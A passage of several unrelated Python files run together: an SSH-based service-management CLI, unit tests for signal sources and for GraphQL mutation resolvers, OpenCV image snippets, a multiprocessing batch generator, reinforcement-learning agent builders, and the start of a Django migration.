future: host if bailey_args is None: bailey_args = [] results = { executor.submit( _barnum, host, bailey_args=bailey_args, dry_run=dry_run, bailey_cmd=bailey_cmd, ): host for host in hosts } for future in concurrent.futures.as_completed(results): host = results[future] try: data = future.result() except Exception as exc: print(f"ERROR on {host}: {exc}") else: print(data) def barnum_single_thread(hosts, bailey_args=None, dry_run=False, bailey_cmd="bailey"): for host in hosts: print( _barnum( host, bailey_args=bailey_args, dry_run=dry_run, bailey_cmd=bailey_cmd, ) ) def main(): args = parse_args() if args.verbose: init_logging(logging.DEBUG) else: init_logging(logging.INFO) logger.debug(f"args: {args}") if args.config_path: config_path = args.config_path else: config_dir = Path( os.environ.get('APPDATA') or os.environ.get('XDG_CONFIG_HOME') or os.path.join(os.environ['HOME'], '.config'), ) / "barnum" config_dir.mkdir(exist_ok=True, parents=True) config_path = config_dir / "barnum_config.yaml" if not config_path.exists(): with open(config_path, "w") as file: file.write("# Add usernames here:\n# - <username1>\n# - <username1>") logger.debug(f"Wrote config file template to {config_path}") if args.user_and_host: try: user, host = args.user_and_host.split("@") except ValueError: user, host = None, args.user_and_host output = _barnum( host=host, user=user, bailey_args=args.bailey_args, dry_run=args.dry_run, bailey_cmd=args.bailey_cmd, ) print("---") print(output) else: users = get_users(config_path) if not users: logger.error(f"You must provide at least one username in {config_path}") sys.exit(1) config_paths = get_user_circus_ini_paths(users) hosts = get_unique_systemd_hosts(config_paths) logger.debug(f"Circus is configured on the following hosts: {', '.join(hosts)}") if args.no_threads: barnum_single_thread( hosts, bailey_args=args.bailey_args, dry_run=args.dry_run, bailey_cmd=args.bailey_cmd, ) else: barnum_multi_thread( hosts, bailey_args=args.bailey_args, dry_run=args.dry_run, bailey_cmd=args.bailey_cmd, ) def get_unique_systemd_hosts(config_file_paths): return set(path.parent.name for path in config_file_paths) def get_user_circus_ini_paths(users): paths = [] for user in users: base = Path("/", "users", user, "circus").glob("*/circus.ini") paths.extend(base) return paths def init_logging(level): """Initialize logging.""" logging.getLogger().setLevel(level) _logger = logging.getLogger(__name__) console_handler = logging.StreamHandler() console_handler.setFormatter(logging.Formatter("barnum: %(message)s")) _logger.addHandler(console_handler) _logger.setLevel(level) class WideHelpFormatter(argparse.HelpFormatter): def __init__(self, *args, **kwargs): # If we can't determine terminal size, just let argparse derive it itself # in the super class width, __ = shutil.get_terminal_size(fallback=(None, None)) if width: kwargs["width"] = width super().__init__(*args, **kwargs) def _format_usage(self, usage, actions, groups, prefix): usage = super()._format_usage(usage, actions, groups, prefix) usage = f"{usage.strip()} [-- BAILEY_ARG [BAILEY_ARG ...] [-- CIRCUS_ARG [CIRCUS_ARG ...]]]" return usage def parse_args(): parser = argparse.ArgumentParser(formatter_class=WideHelpFormatter) parser.add_argument( "user_and_host", nargs="?", help="Can be EITHER user@host OR just host. In the former case, operations will " "affect only the circus instance for user@host. In the latter case, " "operations will affect ALL circus instances on host", ) parser.add_argument( "--config-path", type=Path ) parser.add_argument("--bailey-cmd", default="bailey") parser.add_argument( "-v", "--verbose", action="store_true", help="Increase verbosity" ) parser.add_argument( "-D", "--dry-run", action="store_true", help="Don't make any changes" ) parser.add_argument( "--no-threads", action="store_true", help="Don't use threads for SSH'ing" ) parser.add_argument( "-C", "--circus-cmd", help="Specify the positional argument to send to circus" ) parser.add_argument("--no-colors", action="store_true", help="No colors") # argparse doesn't seem to be able to handle this natively, so we manually # alter sys.argv before argparse sees it in order to pull out all of the # circus arguments try: index = sys.argv.index("--") sys.argv, bailey_args = sys.argv[:index], sys.argv[index + 1 :] except ValueError: bailey_args = [] parsed_args = parser.parse_args() if parsed_args.verbose: bailey_args = ["--verbose", *bailey_args] if not parsed_args.no_colors: bailey_args = ["--force-colors", *bailey_args] if parsed_args.circus_cmd: bailey_args = ["--circus-cmd", parsed_args.circus_cmd, *bailey_args] parsed_args.bailey_args = bailey_args return parsed_args if __name__ == "__main__": main() <filename>tests/test_sources.py import unittest import numpy as np import bioslds.sources as sources from bioslds.arma import make_random_arma class TestSourcesConstant(unittest.TestCase): def test_all_returned_values_are_equal_to_given_constant(self): x = 3.5 src = sources.Constant(x) y = src(size=15) np.testing.assert_allclose(y, x) def test_returns_requested_number_of_values(self): src = sources.Constant(0.5) n = 23 y = src(size=n) self.assertEqual(len(y), n) class TestSourcesConstantStrAndRepr(unittest.TestCase): def setUp(self): self.x = 3.2 self.src = sources.Constant(self.x) def test_str(self): s = str(self.src) s_exp = f"Constant({str(self.x)})" self.assertEqual(s, s_exp) def test_repr(self): r = repr(self.src) r_exp = f"Constant({repr(self.x)})" self.assertEqual(r, r_exp) class TestSourcesStreamBasic(unittest.TestCase): def test_empty_result_if_zero_samples_requested_from_empty_store(self): src = sources.Stream([]) y = src(size=0) self.assertEqual(len(y), 0) def test_reading_samples_from_empty_store_raises_index_error(self): src = sources.Stream([]) with self.assertRaises(IndexError): src(size=1) class TestSourcesStream(unittest.TestCase): def setUp(self): rng = np.random.default_rng(3) self.n = 100 self.data = rng.normal(size=self.n) self.src = sources.Stream(self.data) def test_empty_result_if_zero_samples_requested(self): y = self.src(size=0) self.assertEqual(len(y), 0) def test_returned_samples_match_data(self): y = self.src(size=self.n) np.testing.assert_allclose(y, self.data) def test_generate_n1_then_n2_returns_first_n1_plus_n2(self): n1 = self.n // 3 n2 = self.n // 2 y1 = self.src(size=n1) y2 = self.src(size=n2) y = np.hstack((y1, y2)) data_exp = self.data[: n1 + n2] np.testing.assert_allclose(y, data_exp) def test_requesting_too_many_items_raises_index_error(self): with self.assertRaises(IndexError): self.src(size=self.n + 1) class TestSourcesStreamStrAndRepr(unittest.TestCase): def setUp(self): rng = np.random.default_rng(2) self.n = 10 self.data = rng.normal(size=self.n) self.src = sources.Stream(self.data) def test_str(self): s = str(self.src) s_exp = f"Stream(data_store={str(self.data)}, ptr_=0)" self.assertEqual(s, s_exp) def test_repr(self): r = repr(self.src) r_exp = f"Stream(data_store={str(self.data)}, ptr_=0)" self.assertEqual(r, r_exp) class TestSourcesGaussianNoise(unittest.TestCase): def test_returned_number_of_samples_matches_size(self): src = sources.GaussianNoise(1) n = 50 y = src(size=n) self.assertEqual(len(y), n) def test_returned_samples_are_random(self): src = sources.GaussianNoise(1) n = 10 y1 = src(size=n) y2 = src(size=n) self.assertGreater(np.max(np.abs(y1 - y2)), 1e-3) def test_init_can_take_default_rng_seed_or_rng(self): seed = 123 src1 = sources.GaussianNoise(seed) src2 = sources.GaussianNoise(np.random.default_rng(seed)) n = 13 y1 = src1(size=n) y2 = src2(size=n) np.testing.assert_allclose(y1, y2) def test_loc_matters(self): seed = 123 src1 = sources.GaussianNoise(seed, loc=0) src2 = sources.GaussianNoise(seed, loc=1) n = 13 y1 = src1(size=n) y2 = src2(size=n) self.assertGreater(np.max(np.abs(y1 - y2)), 1e-3) def test_scale_matters(self): seed = 123 src1 = sources.GaussianNoise(seed, scale=1) src2 = sources.GaussianNoise(seed, scale=2) n = 13 y1 = src1(size=n) y2 = src2(size=n) self.assertGreater(np.max(np.abs(y1 - y2)), 1e-3) def test_when_scale_is_zero_all_values_equal_loc(self): loc = 0.35 src = sources.GaussianNoise(1, loc=loc, scale=0) n = 10 y = src(size=n) np.testing.assert_allclose(y, loc) def test_default_loc_is_zero(self): seed = 123 src1 = sources.GaussianNoise(seed) src2 = sources.GaussianNoise(seed, loc=0) n = 13 y1 = src1(size=n) y2 = src2(size=n) np.testing.assert_allclose(y1, y2) def test_default_scale_is_one(self): seed = 1 src1 = sources.GaussianNoise(seed) src2 = sources.GaussianNoise(seed, scale=1) n = 12 y1 = src1(size=n) y2 = src2(size=n) np.testing.assert_allclose(y1, y2) def test_default_seed_is_zero(self): src1 = sources.GaussianNoise() src2 = sources.GaussianNoise(0) n = 13 y1 = src1(size=n) y2 = src2(size=n) np.testing.assert_allclose(y1, y2) class TestSourcesGaussianNoiseStrAndRepr(unittest.TestCase): def setUp(self): self.rng = np.random.default_rng(1) self.loc = -0.5 self.scale = 2.3 self.src = sources.GaussianNoise(self.rng, loc=self.loc, scale=self.scale) def test_str(self): s = str(self.src) s_exp = f"GaussianNoise(loc={self.loc}, scale={self.scale})" self.assertEqual(s, s_exp) def test_repr(self): r = repr(self.src) r_exp = ( f"GaussianNoise(loc={self.loc}, scale={self.scale}, " + f"rng={self.rng})" ) self.assertEqual(r, r_exp) class TestSourcesFixSourceScale(unittest.TestCase): def test_fix_source_scale_does_not_affect_sources_rng_by_default(self): seed = 123 src1 = sources.GaussianNoise(seed) n = 12 u1 = src1(size=n) rng = np.random.default_rng(30) src2 = sources.GaussianNoise(seed) arma = make_random_arma(3, 2, rng, default_source=src2) sources.fix_source_scale(arma) # reset scale src2.scale = 1 u2 = src2(size=n) np.testing.assert_allclose(u1, u2) def test_fix_source_scale_affects_sources_rng_when_use_copy_is_false(self): seed = 123 src1 = sources.GaussianNoise(seed) n = 12 u1 = src1(size=n) rng = np.random.default_rng(30) src2 = sources.GaussianNoise(seed) arma = make_random_arma(3, 2, rng, default_source=src2) sources.fix_source_scale(arma, use_copy=False) # reset scale src2.scale = 1 u2 = src2(size=n) self.assertGreater(np.max(np.abs(u1 - u2)), 1e-3) def test_ar1_output_variance_is_fixed_to_one_by_default(self): seed = 10 src = sources.GaussianNoise(seed) rng = np.random.default_rng(30) arma = make_random_arma(1, 0, rng, default_source=src) sources.fix_source_scale(arma, n_samples=5000) ma_var = src.scale ** 2 arma_var = ma_var / (1 - arma.a[0] ** 2) self.assertAlmostEqual(arma_var, 1, places=2) def test_ar2_output_variance_is_fixed_to_one_by_default(self): seed = 10 src = sources.GaussianNoise(seed) rng = np.random.default_rng(30) arma = make_random_arma(2, 0, rng, default_source=src) sources.fix_source_scale(arma, n_samples=10000) ma_var = src.scale ** 2 a_diff = 1 - arma.a[1] a_sum = 1 + arma.a[1] arma_var = a_diff * ma_var / (a_sum * (a_diff ** 2 - arma.a[0] ** 2)) self.assertAlmostEqual(arma_var, 1, places=2) def test_scale_varies_in_proportion_to_output_variance(self): seed = 10 src = sources.GaussianNoise(seed) rng = np.random.default_rng(30) arma = make_random_arma(2, 0, rng, default_source=src) var1 = 0.5 sources.fix_source_scale(arma, output_std=var1) scale1 = src.scale var2 = 1.5 sources.fix_source_scale(arma, output_std=var2) scale2 = src.scale self.assertAlmostEqual(var1 / var2, scale1 / scale2, places=2) def test_fix_source_scale_returns_final_scale(self): seed = 10 src = sources.GaussianNoise(seed) rng = np.random.default_rng(30) arma = make_random_arma(2, 0, rng, default_source=src) scale = sources.fix_source_scale(arma) self.assertAlmostEqual(scale, src.scale) class TestSourcesFixTransformerScale(unittest.TestCase): def setUp(self): self.args = (2, 2) self.dummy_source = sources.Constant(1) self.arma = make_random_arma(*self.args, rng=np.random.default_rng(0)) self.arma_alt = make_random_arma( *self.args, rng=np.random.default_rng(0), default_source=self.dummy_source ) def test_scale_matches_that_from_fix_source_scale_with_gaussian_by_default(self): scale = sources.fix_transformer_scale(self.arma) self.arma_alt.default_source = sources.GaussianNoise() scale_alt = sources.fix_source_scale(self.arma_alt) self.assertAlmostEqual(scale, scale_alt) def test_arguments_forwarded_to_fix_source_scale(self): kwargs = {"output_std": 3.5, "n_samples": 500} scale = sources.fix_transformer_scale(self.arma, **kwargs) self.arma_alt.default_source = sources.GaussianNoise() scale_alt = sources.fix_source_scale(self.arma_alt, **kwargs) self.assertAlmostEqual(scale, scale_alt) def test_transformer_source_scaling_is_same_as_return_value(self): scale = sources.fix_transformer_scale(self.arma) self.assertAlmostEqual(scale, self.arma.source_scaling) def test_using_different_source_constructor(self): loc = 1.0 seed = 3 scale = sources.fix_transformer_scale( self.arma, source_constructor=lambda **kwargs: sources.GaussianNoise( loc=loc, rng=seed, **kwargs ), ) self.arma_alt.default_source = sources.GaussianNoise(loc=loc, rng=seed) scale_alt = sources.fix_source_scale(self.arma_alt) self.assertAlmostEqual(scale, scale_alt) def test_initial_source_is_reverted_after_function_call(self): self.assertIs(self.arma_alt.default_source, self.dummy_source) if __name__ == "__main__": unittest.main() import numpy import cv2 cap = cv2.VideoCapture(1) ret = cap.set(3,640) # WIDTH ret = cap.set(4,360) # Height ret = cap.set(5,60) # FPS Frame rate while(True): ret, frame = cap.read() cv2.imshow('raw',frame) cv2.waitKey(1) cap.release() cv2.destroyAllWindows() <filename>authors/apps/authentication/tests/test_social_auth.py<gh_stars>0 from django.test import TestCase from django.urls import reverse from rest_framework import status from rest_framework.test import APIClient class SocialAuthViewTest(TestCase): def setUp(self): self.client = APIClient() self.namespace = 'authentication' self.social_url = reverse(self.namespace + ':social_auth') self.data_no_provider = { "access_token": "<PASSWORD>" } self.data_no_token = { "provider": "google-oauth2" } self.data_no_secret = { "provider": "twitter", "access_token": "<PASSWORD>" } # self.data_twitter = { # "provider": "twitter", # "access_token": os.getenv("TWITTER_ACCESS_TOKEN"), # "access_token_secret": os.getenv("TWITTER_ACCESS_SECRET") # } # # self.data_facebook = { # "provider": "facebook", # "access_token": os.getenv("FB_ACCESS_TOKEN") # } # # self.data_google = { # "provider": "google-oauth2", # "access_token": os.getenv("GOOGLE_ACCESS_TOKEN") # } def test_social_auth(self): # res = self.client.post( # self.social_url, # self.data_twitter, # format='json') # # res0 = self.client.post( # self.social_url, # self.data_facebook, # format='json') # # res4 = self.client.post( # self.social_url, # self.data_google, # format='json') res1 = self.client.post( self.social_url, self.data_no_provider, format='json') res2 = self.client.post( self.social_url, self.data_no_token, format='json') res3 = self.client.post( self.social_url, self.data_no_secret, format='json') # self.assertEqual(res.status_code, status.HTTP_201_CREATED) # self.assertEqual(res0.status_code, status.HTTP_201_CREATED) # self.assertEqual(res4.status_code, status.HTTP_201_CREATED) self.assertEqual(res1.status_code, status.HTTP_400_BAD_REQUEST) self.assertEqual(res2.status_code, status.HTTP_400_BAD_REQUEST) self.assertEqual(res3.status_code, status.HTTP_400_BAD_REQUEST) <filename>catkin_ws/src/opencv_img_processing/src/opencv1_fundamentals.py #!/usr/bin/env python3 import cv2 """ Open an image """ img = cv2.imread("../images/python_logo.png") cv2.imshow("My Image", img) cv2.waitKey(0) # waits for a specific time in ms until you press any button. 0 means wait forever. """ Print info about image dimensions """ print(f"Shape of img: {img.shape}") print(f"Size (no of px) of img: {img.size}") print(f"Dtype of img: {img.dtype}") """ Crop out a region-of-interest within the entire image """ roi = img[300:400, 400:500] cv2.imshow("ROI", roi) cv2.waitKey(0) """ Save ROI """ cv2.imwrite("./images/roi.png", roi)# Copyright 2017 Division of Medical Image Computing, German Cancer Research Center (DKFZ) # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from __future__ import print_function from future import standard_library standard_library.install_aliases() from builtins import range from builtins import object from multiprocessing import Process from multiprocessing import Queue as MPQueue import numpy as np import sys import logging class MultiThreadedGenerator(object): def __init__(self, generator, num_processes, num_cached_per_queue, seeds=None): if seeds is not None: assert len(seeds) == num_processes else: seeds = [None] * num_processes self.seeds = seeds self.generator = generator self.num_processes = num_processes self.num_cached_per_queue = num_cached_per_queue self._queues = [] self._threads = [] self._end_ctr = 0 self._queue_loop = 0 def __iter__(self): return self def _next_queue(self): r = self._queue_loop self._queue_loop += 1 if self._queue_loop == self.num_processes: self._queue_loop = 0 return r def __next__(self): if len(self._queues) == 0: self._start() try: item = self._queues[self._next_queue()].get() while item == "end": self._end_ctr += 1 if self._end_ctr == self.num_processes: logging.debug("MultiThreadedGenerator: finished data generation") self._finish() raise StopIteration item = self._queues[self._next_queue()].get() return item except KeyboardInterrupt: logging.error("MultiThreadedGenerator: caught exception: {}".format(sys.exc_info())) self._finish() raise KeyboardInterrupt def _start(self): if len(self._threads) == 0: logging.debug("starting workers") self._queue_loop = 0 self._end_ctr = 0 def producer(queue, generator): for item in generator: queue.put(item) queue.put("end") for i in range(self.num_processes): np.random.seed(self.seeds[i]) self._queues.append(MPQueue(self.num_cached_per_queue)) self._threads.append(Process(target=producer, args=(self._queues[i], self.generator))) self._threads[-1].daemon = True self._threads[-1].start() else: logging.debug("MultiThreadedGenerator Warning: start() has been called but workers are already running") def _finish(self): if len(self._threads) != 0: logging.debug("MultiThreadedGenerator: workers terminated") for i, thread in enumerate(self._threads): thread.terminate() self._queues[i].close() self._queues = [] self._threads = [] self._queue = None self._end_ctr = 0 self._queue_loop = 0 def restart(self): self._finish() self._start() def __del__(self): logging.debug("MultiThreadedGenerator: destructor was called") self._finish() <reponame>cassiobotaro/Rivendell<gh_stars>10-100 # Module to get image metadata import cv2 image = cv2.imread('lena.jpg') height, width, channels = image.shape print(f'Width in pixels: {width}') print(f'Height in pixels: {height}') print(f'Qty of channels: {channels}') # Show image using function imshow cv2.imshow('Window\'s name', image) cv2.waitKey(0) # wait to press any key # Save image into disk using function imwrite() cv2.imwrite('output.jpg', image) """Test the mutation resolvers.""" import itertools import json from typing import Any, Dict import pytest from pytest_mock import MockFixture from ceiba.mongo_interface import USERS_COLLECTION from ceiba.mutation_resolvers import ( resolve_mutation_add_job, resolve_mutation_authentication, resolve_mutation_update_job, resolve_mutation_update_job_status, resolve_mutation_update_property) from .utils_test import MockedCollection, read_jobs # Constant to mock the call PARENT = None INFO = None COOKIE = '{"username": "felipeZ", "token": "Token"}' def check_reply(reply: Dict[str, str]) -> None: """Check that the reply has a valid form.""" assert all(x in reply.keys() for x in {"status", "text"}) async def run_mutation_update_job( policy: str, new: Dict[str, Any], old: Dict[str, Any]) -> Dict[str, Any]: """Test the resolver for updating jobs.""" args = { "input": new, 'cookie': COOKIE, "duplication_policy": policy } # Mock database ctx = {"mongodb": { "jobs_awesome_data": MockedCollection(old), "awesome_data": MockedCollection({'data': '{"prop": 42}'})}} reply = await resolve_mutation_update_job(PARENT, args, ctx, INFO) return reply @pytest.mark.asyncio async def test_mutation_add_job(mocker: MockFixture): """Test the resolver for adding jobs.""" job = read_jobs()[1] args = {"input": job, "cookie": COOKIE} # Mock database ctx = {"mongodb": { "jobs_awesome_data": MockedCollection(job), "awesome_data": MockedCollection(None)}} mocker.patch("ceiba.mutation_resolvers.is_user_authenticated", return_value=True) reply = await resolve_mutation_add_job(PARENT, args, ctx, INFO) check_reply(reply) @pytest.mark.asyncio async def test_mutation_add_nonexisting_job(mocker: MockFixture): """Test the resolver for adding jobs.""" job = read_jobs()[1] args = {"input": job, 'cookie': COOKIE} # Mock database ctx = {"mongodb": { "jobs_awesome_data": MockedCollection(None), "awesome_data": MockedCollection(None)}} mocker.patch("ceiba.mutation_resolvers.is_user_authenticated", return_value=True) reply = await resolve_mutation_add_job(PARENT, args, ctx, INFO) check_reply(reply) @pytest.mark.asyncio async def test_mutation_update_job(mocker: MockFixture): """Test the resolver for updating jobs.""" mocker.patch("ceiba.mutation_resolvers.is_user_authenticated", return_value=True) # The first job is done the second available done_available = read_jobs() # Test keep policy for job1, job2 in itertools.product(done_available, done_available): reply = await run_mutation_update_job("KEEP", job1, job2) check_reply(reply) # Test overwrite policy for job1, job2 in itertools.product(done_available, done_available): reply = await run_mutation_update_job("OVERWRITE", job1, job2) check_reply(reply) # Test merge policy for job1, job2 in itertools.product(done_available, done_available): reply = await run_mutation_update_job("MERGE", job1, job2) check_reply(reply) @pytest.mark.asyncio async def test_mutation_update_job_status(mocker: MockFixture): """Check the job status updater.""" args = {"input": { "_id": 3141592, "collection_name": "awesome_data", "status": "RESERVED"}, 'cookie': COOKIE } # Mock database ctx = {"mongodb": { "jobs_awesome_data": MockedCollection(read_jobs())}} mocker.patch("ceiba.mutation_resolvers.is_user_authenticated", return_value=True) reply = await resolve_mutation_update_job_status(PARENT, args, ctx, INFO) assert reply['status'] == 'DONE' @pytest.mark.asyncio async def test_mutation_update_property(mocker: MockFixture): """Check the job status updater.""" args = {"input": { "_id": 101010, "collection_name": "awesome_data", "data": '{"pi": "3.14159265358979323846"}'}, 'cookie': COOKIE} # Mock database ctx = {"mongodb": { "awesome_data": MockedCollection(None)}} mocker.patch("ceiba.mutation_resolvers.is_user_authenticated", return_value=True) reply = await resolve_mutation_update_property(PARENT, args, ctx, INFO) assert reply['status'] == 'DONE' @pytest.mark.asyncio async def test_mutation_authentication_invalid_token(): """Check the authentication resolver for an invalid_token.""" args = {"token": "InvalidToken"} # Mock database ctx = {"mongodb": { USERS_COLLECTION: MockedCollection(None)}} reply = await resolve_mutation_authentication(PARENT, args, ctx, INFO) assert reply['status'] == "FAILED" assert "Invalid Token" in reply['text'] @pytest.mark.asyncio async def test_mutation_authentication_invalid_user(mocker: MockFixture): """Check the authentication resolver for an invalid_token.""" args = {"token": "VeryLongToken"} # Mock database ctx = {"mongodb": { USERS_COLLECTION: MockedCollection(None)}} mocker.patch("ceiba.mutation_resolvers.authenticate_username", return_value="someone") reply = await resolve_mutation_authentication(PARENT, args, ctx, INFO) assert reply['status'] == "FAILED" assert "doesn't have permissions" in reply['text'] @pytest.mark.asyncio async def test_mutation_authentication_valid_user(mocker: MockFixture): """Check the authentication resolver for an invalid_token.""" args = {"token": "<PASSWORD>"} # Mock database ctx = {"mongodb": { USERS_COLLECTION: MockedCollection({"username": "RosalindFranklin"})}} mocker.patch("ceiba.mutation_resolvers.authenticate_username", return_value="RosalindFranklin") reply = await resolve_mutation_authentication(PARENT, args, ctx, INFO) cookie = json.loads(reply['text']) assert reply['status'] == "DONE" assert cookie['username'] == "RosalindFranklin" async def check_non_authenticated_user(fun, mocker: MockFixture) -> None: """Check that an error message is return if the user is not authenticated.""" args = { 'cookie': COOKIE, } # Mock database ctx = {"mongodb": None} mocker.patch("ceiba.mutation_resolvers.is_user_authenticated", return_value=False) reply = await fun(PARENT, args, ctx, INFO) assert reply['status'] == "FAILED" assert "The user is not authenticated" in reply['text'] @pytest.mark.asyncio async def test_nonauthenticated_user(mocker: MockFixture): """Check that an error message is return if the user is not authenticated.""" functions = {resolve_mutation_update_job, resolve_mutation_update_job_status, resolve_mutation_update_property, resolve_mutation_add_job} for fun in functions: await check_non_authenticated_user(fun, mocker) # coding: utf-8 """Collection of policy learning algorithms.""" from typing import Optional, Callable from functools import partial import torch import torch.nn as nn import torch.nn.functional as F import torch.optim as optim from torch.utils.data import DataLoader from ignite.engine import Events from irl.exploration.explorer import Explorer from irl.exploration.datasets import Trajectories import irl.algo.trainers as trainers import irl.exploration.transforms as T def create_reinforce( policy: nn.Module, optimizer: optim.Optimizer, discount: float = 0.99, exploration: float = 0.001, norm_returns: bool = True, grad_norm_clip: Optional[float] = 1.0, dtype: Optional[torch.dtype] = None, device: Optional[torch.device] = None, ) -> Explorer: """Create an agent using Reinforce learning algorithm. Parameters ---------- policy: The neural network used to model the policy. optimizer: The optimizer used to update the `model` parameters. discount: The discount rate used for computing the returns. exploration: The entropy bonus for encouraging exploration. norm_returns: Whether to normalize the rewards with zero mean and unit variance. Computed over an episode. Raise an error for episode of length 1. grad_norm_clip: Value to clip the norm of the gradient at before applying an update. dtype: Type the obseravtions/model are casted to. device: Device the observations/model are moved to. Returns ------- agent: The ignite engine, exploring the environement and optimizing. """ policy.to(device=device, dtype=dtype) def select_action(engine: Explorer, observation): policy.train() action_distrib = policy(observation) action = action_distrib.sample() engine.store_transition_members( log_prob=action_distrib.log_prob(action), entropy=action_distrib.entropy() ) return action agent = Explorer(select_action=select_action, dtype=dtype, device=device) agent.register_transition_members("log_prob", "entropy") @agent.on(Events.STARTED) def add_trajectories_to_engine(engine): engine.state.trajectories = Trajectories( T.WithReturns(discount=discount, norm_returns=norm_returns) ) @agent.on(Events.EPOCH_STARTED) def empty_trajectectories(engine): engine.state.trajectories.clear() @agent.on(Events.ITERATION_COMPLETED) def append_transition(engine): engine.state.trajectories.append(engine.state.transition) @agent.on(Events.EPOCH_COMPLETED) def optimize(engine): engine.state.trajectories.terminate_trajectory() # The setting is simple enough that using a dataloader is overkill. optimizer.zero_grad() for transition in engine.state.trajectories: loss = -transition.retrn * transition.log_prob loss -= exploration * transition.entropy loss.backward() if grad_norm_clip is not None: nn.utils.clip_grad_norm_(policy.parameters(), grad_norm_clip) optimizer.step() return agent def create_a2c( actor_critic: nn.Module, optimizer: optim.Optimizer, discount: float = 0.99, exploration: float = 0.001, norm_returns: bool = True, critic_loss: Callable = F.mse_loss, critic_multiplier: float = 1.0, grad_norm_clip: Optional[float] = 1.0, dtype: Optional[torch.dtype] = None, device: Optional[torch.device] = None, ) -> Explorer: """Create an agent using Reinforce learning algorithm. Parameters ---------- actor_critic: The neural network used to model the policy and critic. Must return a tuple (action probalility distribution, critic value). optimizer: The optimizer used to update the `model` parameters. discount: The discount rate used for computing the returns. exploration: The entropy bonus for encouraging exploration. norm_returns: Whether to normalize the rewards with zero mean and unit variance. Computed over an episode. Raise an error for episode of length 1. critic_loss: The loss function used to learn the critic. critic_multiplier: Multiplier used for the critic loss in the total loss. grad_norm_clip: Value to clip the norm of the gradient at before applying an update. dtype: Type the obseravtions/model are casted to. device: Device the observations/model are moved to. Returns ------- agent: The ignite engine, exploring the environement and optimizing. """ actor_critic.to(device=device, dtype=dtype) def select_action(engine, observation): actor_critic.train() action_distrib, critic_value = actor_critic(observation) action = action_distrib.sample() engine.store_transition_members( log_prob=action_distrib.log_prob(action), entropy=action_distrib.entropy(), critic_value=critic_value, ) return action agent = Explorer(select_action=select_action, dtype=dtype, device=device) agent.register_transition_members("log_prob", "entropy", "critic_value") @agent.on(Events.STARTED) def add_trajectories_to_engine(engine): engine.state.trajectories = Trajectories( T.WithReturns(discount=discount, norm_returns=norm_returns) ) @agent.on(Events.EPOCH_STARTED) def empty_trajectectories(engine): engine.state.trajectories.clear() @agent.on(Events.ITERATION_COMPLETED) def append_transition(engine): engine.state.trajectories.append(engine.state.transition) @agent.on(Events.EPOCH_COMPLETED) def optimize(engine): engine.state.trajectories.terminate_trajectory() # The setting is simple enough that using a dataloader is overkill. optimizer.zero_grad() for t in engine.state.trajectories: loss = -(t.retrn - t.critic_value.detach()) * t.log_prob loss -= exploration * t.entropy retrn = t.critic_value.new([t.retrn]) # Make tensor on same device loss += critic_multiplier * critic_loss(t.critic_value, retrn) loss.backward() if grad_norm_clip is not None: nn.utils.clip_grad_norm_(actor_critic.parameters(), grad_norm_clip) optimizer.step() return agent def create_ppo( actor_critic: nn.Module, optimizer: optim.Optimizer, discount: float = 0.99, lambda_: float = 0.9, ppo_clip: float = 0.02, exploration_loss_coef: float = 0.001, critic_loss_coef: float = 1.0, critic_loss_function: Callable = F.mse_loss, norm_returns: bool = True, norm_gaes: bool = True, dataset_size: int = 1024, n_epochs: int = 10, # FIXME change the way the dataloader is passed on to the function batch_size: int = 16, dtype: Optional[torch.dtype] = None, device: Optional[torch.device] = None, ) -> Explorer: """Create an agent using Proximal Policy Optimization learning algorithm. Parameters ---------- actor_critic: The neural network used to model the policy and critic. Must return a tuple (action probalility distribution, critic value). optimizer: The optimizer used to update the `model` parameters. discount: The discount rate used for computing the returns. lambda_: Lambda discount as defined in Generalized Advantage Estimation. ppo_clip: Clip parameter for the PPO loss. exploration_loss_coef: The entropy bonus for encouraging exploration. critic_loss_coef: Mutiplier for the critic loss. critic_loss_function: Loss function used by the critic. norm_returns: Whether to normalize returns. Running averages are kept per task (use `task_id` to differentiate tasks) and used to scale back critic for bootstrapping and GAEs. norm_gaes: Whether to normalize the advantages. Independant from the normalization of returns that is used to scale back the critic. This happens on the final advantages. dataset_size: Size of the PPO dataset to collect information from agents. n_epoch: Number of epoch of optimization to be on a single PPO dataset. batch_size: Batch size used to optimized over the PPO dataset. dtype: Type the obseravtions/model are casted to. device: Device the observations/model are moved to. Returns ------- The ignite engine, exploring the environement and optimizing. """ actor_critic.to(device=device, dtype=dtype) def select_action(engine, observation): with torch.no_grad(): actor_critic.eval() action_distrib, critic_value = actor_critic(observation) action = action_distrib.sample() engine.store_transition_members( log_prob=action_distrib.log_prob(action), entropy=action_distrib.entropy(), critic_value=critic_value, ) return action agent = Explorer(select_action=select_action, dtype=dtype, device=device) agent.register_transition_members("log_prob", "entropy", "critic_value") trainer = trainers.create_ppo_trainer( actor_critic=actor_critic, optimizer=optimizer, ppo_clip=ppo_clip, exploration_loss_coef=exploration_loss_coef, critic_loss_coef=critic_loss_coef, critic_loss_function=critic_loss_function, device=device, dtype=dtype, ) @agent.on(Events.STARTED) def add_trajectories_and_trainer_to_engine(engine): engine.state.trajectories = Trajectories( T.compose( T.WithGAEs( discount=discount, lambda_=lambda_, norm_gaes=norm_gaes, norm_returns=norm_returns, ), partial(map, T.PinIfCuda(device=device)), ) ) engine.state.trainer = trainer @agent.on(Events.ITERATION_COMPLETED) def append_transition(engine): engine.state.trajectories.append(engine.state.transition.cpu()) @agent.on(Events.EPOCH_COMPLETED) def terminate_trajectory_and_data_collection(engine): engine.state.trajectories.terminate_trajectory() @agent.on(Events.EPOCH_COMPLETED) def optimize(engine): if len(engine.state.trajectories) >= dataset_size: sample_elem = engine.state.trajectories[0] dataloader = DataLoader( dataset=engine.state.trajectories, batch_size=batch_size, collate_fn=sample_elem.__class__.collate, drop_last=True, ) engine.state.trainer.run(dataloader, n_epochs) engine.state.trajectories.clear() return agent <filename>bluebottle/mails/migrations/0003_auto_20180727_1122.py # -*- coding: utf-8 -*- # Generated by Django 1.10.8 on 2018-07-27 09:22 from __future__ import unicode_literals from django.db import migrations def create_settings(apps, schema_editor): MailPlatformSettings = apps.get_model('mails', 'MailPlatformSettings') if not MailPlatformSettings.objects.count(): MailPlatformSettings.objects.create() def backward(apps, schema_editor): pass class Migration(migrations.Migration): dependencies = [ ('mails', '0002_auto_20171211_1117'), ] operations = [ 